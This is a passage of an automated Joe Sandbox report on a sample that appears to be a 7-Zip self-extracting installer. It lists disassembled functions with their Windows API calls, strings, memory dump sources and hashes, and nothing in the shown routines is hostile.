                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@
                                                                            • String ID: %%T/$%%T\
                                                                            • API String ID: 613200358-2679640699
                                                                            • Opcode ID: 84eac95e95d6c5eb007509f266f800828e6efa501b0eccf996cbc51e64bef556
                                                                            • Instruction ID: 8200ff4dc01eb7e5f3d0cd3b0db6b275db18d134b8f46633e684875e90eeb5b2
                                                                            • Opcode Fuzzy Hash: 84eac95e95d6c5eb007509f266f800828e6efa501b0eccf996cbc51e64bef556
                                                                            • Instruction Fuzzy Hash: 7D11C935D00109FADF05FFA1D897CEDBB79AF10308F50812AB915721E1DB7856899B98
                                                                            Function 00403F77 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%S\,0041572C,?,?,00000000,00404622,?,?,00000000,?,?,00406260,?), ref: 00403FBD
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%S/,0041571C,?,?,?,%%S\,0041572C,?,?,00000000,00404622,?,?), ref: 00403FFB
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%S/,0041571C,?,?,?,%%S\,0041572C,?,?,00000000), ref: 00404021
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%S/,0041571C,?,?,?,%%S\,0041572C,?,?), ref: 00404029
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@
                                                                            • String ID: %%S/$%%S\
                                                                            • API String ID: 613200358-358529586
                                                                            • Opcode ID: e6382aac0b58fc4f3495a13b9dee087f390af011affcf5e9978a04eae41b0fba
                                                                            • Instruction ID: ba471a5e309da56b19bd8a7b5a96c0f25c3cff1cb933eb2d3e2d1b68bec26358
                                                                            • Opcode Fuzzy Hash: e6382aac0b58fc4f3495a13b9dee087f390af011affcf5e9978a04eae41b0fba
                                                                            • Instruction Fuzzy Hash: 1811F935C00109FADF05FFA1D993CEE7B38AF10308F50812AB915721E1DB7856899B88
                                                                            Function 0040D79C Relevance: 10.5, APIs: 1, Strings: 6, Instructions: 42COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _CxxThrowException.MSVCRT(00416CB4,00417010), ref: 0040D834
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionThrow
                                                                            • String ID: XkA$XkA$`lA$plA$xmA$xmA
                                                                            • API String ID: 432778473-1797977924
                                                                            • Opcode ID: 53bc111bba272141f362da7732371027c6ffd9fc40c0fe37927965c24cbe44eb
                                                                            • Instruction ID: 93ec62a24b9d8e66450440f0cc9ce576a4bb083ddd4f3a3c79e319c7eabf7869
                                                                            • Opcode Fuzzy Hash: 53bc111bba272141f362da7732371027c6ffd9fc40c0fe37927965c24cbe44eb
                                                                            • Instruction Fuzzy Hash: AB11D3B0601B008AC3308F169549587FBF8EF51758712CA1FD09A97A10D3F8E1888B99
                                                                            Function 004054C1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 92COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00419858,00000001,00419858,00419858,00000001,?,00000000), ref: 00405543
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00419858,;!@InstallEnd@!,00000000,;!@Install@!UTF-8!,0041942C,00419858,00000001,?,00000000), ref: 004055A5
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00419858,;!@InstallEnd@!,00000000,;!@Install@!UTF-8!,0041942C,00419858,00000001,?,00000000), ref: 004055BD
                                                                              • Part of subcall function 004036F1: lstrlenW.KERNEL32(004017CF,00000000,?,?,?,?,?,?,004017CF,?), ref: 004036FE
                                                                              • Part of subcall function 004036F1: GetSystemTimeAsFileTime.KERNEL32(?,004017CF,?,?,?,?,004017CF,?), ref: 00403774
                                                                              • Part of subcall function 004036F1: GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 0040377B
                                                                              • Part of subcall function 004036F1: ??3@YAXPAX@Z.MSVCRT(?,004017CF,?,?,?,?,004017CF,?), ref: 0040383A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@$FileTime$AttributesSystemlstrlen
                                                                            • String ID: ;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                            • API String ID: 4038993085-372238525
                                                                            • Opcode ID: 2b903074784fb68403b64733b53b7fb33f9721368cdbd91069c7a4aef1d44472
                                                                            • Instruction ID: 9c73dee187ac7940ac785f0cdfe29d60513ad58ba118a45472d9fba9eb214e5e
                                                                            • Opcode Fuzzy Hash: 2b903074784fb68403b64733b53b7fb33f9721368cdbd91069c7a4aef1d44472
                                                                            • Instruction Fuzzy Hash: EA314871D0021AEACF01EF92CC569EEBB75FF58318F10402BE415722D1DB785645DB98
                                                                            Function 00401000 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: wsprintf$ExitProcesslstrcat
                                                                            • String ID: 0x%p
                                                                            • API String ID: 2530384128-1745605757
                                                                            • Opcode ID: 10580a38aa47e309b50d487dd3db663a32dca6cab9aaec04e50353585ed6c2b6
                                                                            • Instruction ID: 82a0a4c7c3cac984b025113f951df6a1ad0c5e072908762b67de37e2b53db34b
                                                                            • Opcode Fuzzy Hash: 10580a38aa47e309b50d487dd3db663a32dca6cab9aaec04e50353585ed6c2b6
                                                                            • Instruction Fuzzy Hash: A4114FB5800308EFDB20EFA4DD85ADBB3BCAF44304F54447BE645A3591D678AA84CF69
                                                                            Function 00407DA1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00407DB6
                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00407DCF
                                                                            • SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 00407DEB
                                                                            • SHGetMalloc.SHELL32(00000000), ref: 00407E15
                                                                              • Part of subcall function 00407B90: GetDlgItem.USER32(?,000004B6), ref: 00407B9D
                                                                              • Part of subcall function 00407B90: SetFocus.USER32(00000000,?,?,00407C84,000004B6,?), ref: 00407BA4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: BrowseFocusFolderFromItemListMallocPathmemset
                                                                            • String ID: A
                                                                            • API String ID: 1557639607-3554254475
                                                                            • Opcode ID: 18cc2c60aeb3b7b122a965faa4dd677926e4bfd12edb83007c1ba79b931f09b9
                                                                            • Instruction ID: c991f1184b04d71a34ab75a046ed33f3991a90ed18c7befb8679fee52583d13b
                                                                            • Opcode Fuzzy Hash: 18cc2c60aeb3b7b122a965faa4dd677926e4bfd12edb83007c1ba79b931f09b9
                                                                            • Instruction Fuzzy Hash: C3111F71A04208EBDB20DBA5C958BDE77BCAB84705F1400B9E905E7281DB78EE45CBB5
                                                                            Function 00402B71 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000001,00000000,?,?,?), ref: 00402BA2
                                                                            • ??3@YAXPAX@Z.MSVCRT(?), ref: 00402BAB
                                                                              • Part of subcall function 00401172: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 00401192
                                                                              • Part of subcall function 00401172: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 004011B8
                                                                            • ExpandEnvironmentStringsW.KERNEL32(SetEnvironment,00000000,00000001,00000001,SetEnvironment), ref: 00402BC3
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00402BE3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@$EnvironmentExpandStrings$??2@
                                                                            • String ID: SetEnvironment
                                                                            • API String ID: 612612615-360490078
                                                                            • Opcode ID: a1c705515403c0a0f0d3fe43341ef8c84b8a99b42ffc9b0f279362683b036e50
                                                                            • Instruction ID: 872148d7285510cba3beb976fe90dd67b0f7b9c7622c942f2c5d0e041fd95c9f
                                                                            • Opcode Fuzzy Hash: a1c705515403c0a0f0d3fe43341ef8c84b8a99b42ffc9b0f279362683b036e50
                                                                            • Instruction Fuzzy Hash: 93015E72D00104BADB15ABA5ED81DEEB3BCAF44314B10416BF902B71D1DBB96A418AA8
                                                                            Function 0040464B Relevance: 7.6, APIs: 5, Instructions: 96stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(004193C0,00000020,-00000002,-00000004,00405FF0,-00000002,?,?,00000000,0000000A), ref: 00404664
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00404716
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 0040471E
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 0040472D
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00404735
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@$lstrlen
                                                                            • String ID:
                                                                            • API String ID: 2031685711-0
                                                                            • Opcode ID: a45d510ae1538bb769c480bb42da49c1a16301055923b34945e590d69a25caba
                                                                            • Instruction ID: aeb94b40578403fee1b74b38ef18ad41e7f72b790eaa200ba48685626c4261d0
                                                                            • Opcode Fuzzy Hash: a45d510ae1538bb769c480bb42da49c1a16301055923b34945e590d69a25caba
                                                                            • Instruction Fuzzy Hash: 6B214972D00104ABCF216FA0CC019EE77A8EF96355F10443BEA41B72E1F77E4D818648
                                                                            Function 0040809D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00407A6B: GetSystemMetrics.USER32(0000000B), ref: 00407A93
                                                                              • Part of subcall function 00407A6B: GetSystemMetrics.USER32(0000000C), ref: 00407A9C
                                                                            • GetSystemMetrics.USER32(00000007), ref: 004080B4
                                                                            • GetSystemMetrics.USER32(00000007), ref: 004080C5
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,000004B8,?,?), ref: 0040818C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: MetricsSystem$??3@
                                                                            • String ID: 100%%
                                                                            • API String ID: 2562992111-568723177
                                                                            • Opcode ID: f97ada8ea1c28143f02298183820e063e18118760441c1241ef7ee3e932a0dae
                                                                            • Instruction ID: 0c509f118c308a7c78e08742548c734dda8a0b47b1f593a1d30cecdc3777ed32
                                                                            • Opcode Fuzzy Hash: f97ada8ea1c28143f02298183820e063e18118760441c1241ef7ee3e932a0dae
                                                                            • Instruction Fuzzy Hash: CE31D471A007059FCB24DF65C9459AEB7F4EF40704B00052ED542A72D1DB74FD45CBA9
                                                                            Function 00404E99 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00407C87: GetSystemMetrics.USER32(00000010), ref: 00407CC9
                                                                              • Part of subcall function 00407C87: GetSystemMetrics.USER32(00000011), ref: 00407CD7
                                                                            • wsprintfW.USER32 ref: 00404F19
                                                                            • ??3@YAXPAX@Z.MSVCRT(00405872,00000011,00405872,00000000,004166D0,?), ref: 00404F56
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: MetricsSystem$??3@wsprintf
                                                                            • String ID: %X - %03X - %03X - %03X - %03X$xcA
                                                                            • API String ID: 1174869416-1550840741
                                                                            • Opcode ID: ec52412db155f98f9bae88259a305981963c0d87f79b64e660b9967a4ff67c2f
                                                                            • Instruction ID: 41466d8614d0a23c37c50aec3ef54a83e840c1df2718244856808616b3002f3b
                                                                            • Opcode Fuzzy Hash: ec52412db155f98f9bae88259a305981963c0d87f79b64e660b9967a4ff67c2f
                                                                            • Instruction Fuzzy Hash: F9117F71D44218ABDB15EB90DC56FEDB334BB10B08F10417EEA55361D2DBB86A44CB9C
                                                                            Function 0040421B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(Mg@,00000000,?,00000000,00404262,00000000,00000000,0040674D,?,waitall,00000000,00000000,?,?,00419810), ref: 00404228
                                                                            • lstrlenW.KERNEL32(?,?,?,00419810), ref: 00404231
                                                                            • _wcsnicmp.MSVCRT ref: 0040423D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen$_wcsnicmp
                                                                            • String ID: Mg@
                                                                            • API String ID: 2823567412-3680729969
                                                                            • Opcode ID: ba891c330881e9cd37824329b79c8b3bdedf28b88df0ad5e9eae37b6568f1235
                                                                            • Instruction ID: 9e1626592046255a92b3b8c2eb79444d9ed7104295bc7c238f4b93e2fb8c8d27
                                                                            • Opcode Fuzzy Hash: ba891c330881e9cd37824329b79c8b3bdedf28b88df0ad5e9eae37b6568f1235
                                                                            • Instruction Fuzzy Hash: 09E026726042019BC700CBA5ED84C8B7BECEAC8790B00087BF700E3011E334D8148BB5
                                                                            Function 004023B5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,00406A9D,00000000,?,?), ref: 004023C8
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004023CF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32
                                                                            • API String ID: 2574300362-3900151262
                                                                            • Opcode ID: cd6f73cecb1163c3412e02ff2c631c42379205c8e465c85e169b66b0ab90bb67
                                                                            • Instruction ID: 50d9489a907287b4f58dec005f8c8a71b0fe89906bae8f062ddf8536b40cf8c2
                                                                            • Opcode Fuzzy Hash: cd6f73cecb1163c3412e02ff2c631c42379205c8e465c85e169b66b0ab90bb67
                                                                            • Instruction Fuzzy Hash: C3D0C970A91700FBDB511FA0EE2DBD636A6EB80B0BF448436E812A00F0C7FC4884CA1C
                                                                            Function 004023E9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,0040243F,?,004069D7,?,00000000,?,?), ref: 004023FA
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00402401
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32
                                                                            • API String ID: 2574300362-736604160
                                                                            • Opcode ID: 3cb0454e562955199366be55c27431b89f07c429e32f9a257932cf547d8e03b3
                                                                            • Instruction ID: 88d9777829bf04cc8710f0dfabc1d7fbda4bae52ffa2c7d5b88ac942ae81d74a
                                                                            • Opcode Fuzzy Hash: 3cb0454e562955199366be55c27431b89f07c429e32f9a257932cf547d8e03b3
                                                                            • Instruction Fuzzy Hash: FFD0C970691600FAD7105FA4DD2DBC639A6AFC0B06F548026A016E00D4C7FC4880861D
                                                                            Function 0040CD11 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _CxxThrowException.MSVCRT(00100EC3,00417010), ref: 0040CD3C
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000004,004193AC,004193AC,00000000,?,0040CE09,00000064,004107AA,004193AC,004032FF,00000000,00000000,004049F2,?,?,?), ref: 0040CD64
                                                                            • memcpy.MSVCRT(00000000,0061A348,00000004,004193AC,004193AC,00000000,?,0040CE09,00000064,004107AA,004193AC,004032FF,00000000,00000000,004049F2,?), ref: 0040CD8D
                                                                            • ??3@YAXPAX@Z.MSVCRT(0061A348,004193AC,004193AC,00000000,?,0040CE09,00000064,004107AA,004193AC,004032FF,00000000,00000000,004049F2,?,?,?), ref: 0040CD98
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@??3@ExceptionThrowmemcpy
                                                                            • String ID:
                                                                            • API String ID: 3462485524-0
                                                                            • Opcode ID: 7a43a3fc08f1f35b46db7763ec9cd67e84bfc7e399de81595ed43b4671788ed1
                                                                            • Instruction ID: d1fdfccabdcefd16927407a1053df183a81c89610647dbf5fb7e55cd38556c17
                                                                            • Opcode Fuzzy Hash: 7a43a3fc08f1f35b46db7763ec9cd67e84bfc7e399de81595ed43b4671788ed1
                                                                            • Instruction Fuzzy Hash: 2F11E572200300EBCB289F16D9C0D5BFFE9AF843547108A3FE559A7390D779E98547A8
                                                                            Function 00408A1C Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 004071BD: GetDlgItem.USER32(?,?), ref: 004071C9
                                                                              • Part of subcall function 004071DA: GetDlgItem.USER32(?,?), ref: 004071E7
                                                                              • Part of subcall function 004071DA: ShowWindow.USER32(00000000,?), ref: 004071FE
                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00408A64
                                                                            • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 00408A84
                                                                            • GetDlgItem.USER32(?,000004B7), ref: 00408A97
                                                                            • SetWindowLongW.USER32(00000000,000000FC,Function_00007823), ref: 00408AA5
                                                                              • Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00408AB5), ref: 00408714
                                                                              • Part of subcall function 004086EB: LoadIconW.USER32(00000000), ref: 00408717
                                                                              • Part of subcall function 004086EB: GetSystemMetrics.USER32(00000032), ref: 0040872B
                                                                              • Part of subcall function 004086EB: GetSystemMetrics.USER32(00000031), ref: 00408730
                                                                              • Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00408AB5), ref: 00408739
                                                                              • Part of subcall function 004086EB: LoadImageW.USER32(00000000), ref: 0040873C
                                                                              • Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000001,?), ref: 0040875C
                                                                              • Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408765
                                                                              • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 00408781
                                                                              • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 0040878B
                                                                              • Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 00408797
                                                                              • Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087A6
                                                                              • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087B4
                                                                              • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087C2
                                                                              • Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 004087CE
                                                                              • Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087DD
                                                                              • Part of subcall function 00407B90: GetDlgItem.USER32(?,000004B6), ref: 00407B9D
                                                                              • Part of subcall function 00407B90: SetFocus.USER32(00000000,?,?,00407C84,000004B6,?), ref: 00407BA4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
